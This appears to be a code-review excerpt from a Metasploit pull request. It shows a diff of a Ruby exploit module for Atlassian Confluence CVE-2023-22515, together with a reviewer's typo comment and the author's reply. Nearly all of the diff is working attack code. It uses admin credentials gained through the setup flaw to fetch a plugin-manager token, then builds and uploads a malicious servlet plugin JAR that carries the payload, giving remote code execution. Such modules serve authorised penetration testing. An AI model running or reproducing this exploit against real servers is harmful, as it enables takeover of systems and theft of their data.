modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /setup/finishsetup.action')
+    end
+
+    print_status('Adding a malicious plugin...')
+
+    # 4. Upload a new Confluence Servlet plugin, by first requesting a UPM token.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
+      'headers' => {
+        'Authorization' => basic_auth(admin_username, admin_password),
+        'Accept' => '*/*'
+      },
+      'vars_get' => {
+        'os_authType' => 'basic'
+      }
+    )
+
+    unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Unexpected reply from endpoint: /rest/plugins/1.0/')
+    end
+
+    upm_token = res.headers['upm-token']
+    unless upm_token
+      fail_with(Failure::UnexpectedReply, 'No UPM token from endpoint: /rest/plugins/1.0/')
+    end
+
+    begin
+      payload_endpoint = rand_text_alphanumeric(8)
+
+      plugin_key = rand_text_alpha(8)
+
+      # 5. Construct a malicious Servlet plugin JAR file.
+      jar = payload.encoded_jar
+
+      jar.add_file(
+        'atlassian-plugin.xml',
+        %(
+<atlassian-plugin name="#{rand_text_alpha(8)}" key="#{plugin_key}" plugins-version="2">
+  <plugin-info>
+    <description>#{rand_text_alphanumeric(8)}</description>
+    <version>1.0</version>
+  </plugin-info>
+  <servlet key="#{rand_text_alpha(8)}" class="metasploit.PayloadServlet">
+    <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>
+  </servlet>
+</atlassian-plugin>)
+      )
+
+      jar.add_file('metasploit/PayloadServlet.class', MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class'))
+
+      message = Rex::MIME::Message.new
+
+      message.add_part(jar.pack, 'application/octet-stream', 'binary', "form-data; name=\"plugin\"; filename=\"#{rand_text_alphanumeric(8)}.jar\"")
+
+      # 6. Upload the malicious plugin.
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'plugins', '1.0') << '/',
+        'ctype' => 'multipart/form-data; boundary=' + message.bound,
+        'headers' => {
+          'Authorization' => basic_auth(admin_username, admin_password),
+          'Accept' => '*/*'
+        },
+        'vars_get' => {
+          'token' => upm_token
+        },
+        'data' => message.to_s
+      )
+
+      unless res&.code == 202
+        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply from endpoint: /rest/plugins/1.0/')
+      end
+
+      unless res.body =~ %r{<textarea>(.+)</textarea>}
+        fail_with(Failure::UnexpectedReply, 'Uploading plugin failed, unexpected reply data from endpoint: /rest/plugins/1.0/')
+      end
+
+      plugin_json = JSON.parse(::Regexp.last_match(1))
+
+      # We get bas a JSON object like this:
```

Comment:
What is a "bas"?

Reply:
resolved via [9e6e953](https://github.com/rapid7/metasploit-framework/pull/18461/commits/9e6e9538e167fa91d12447aae2d3a59a5a009a29)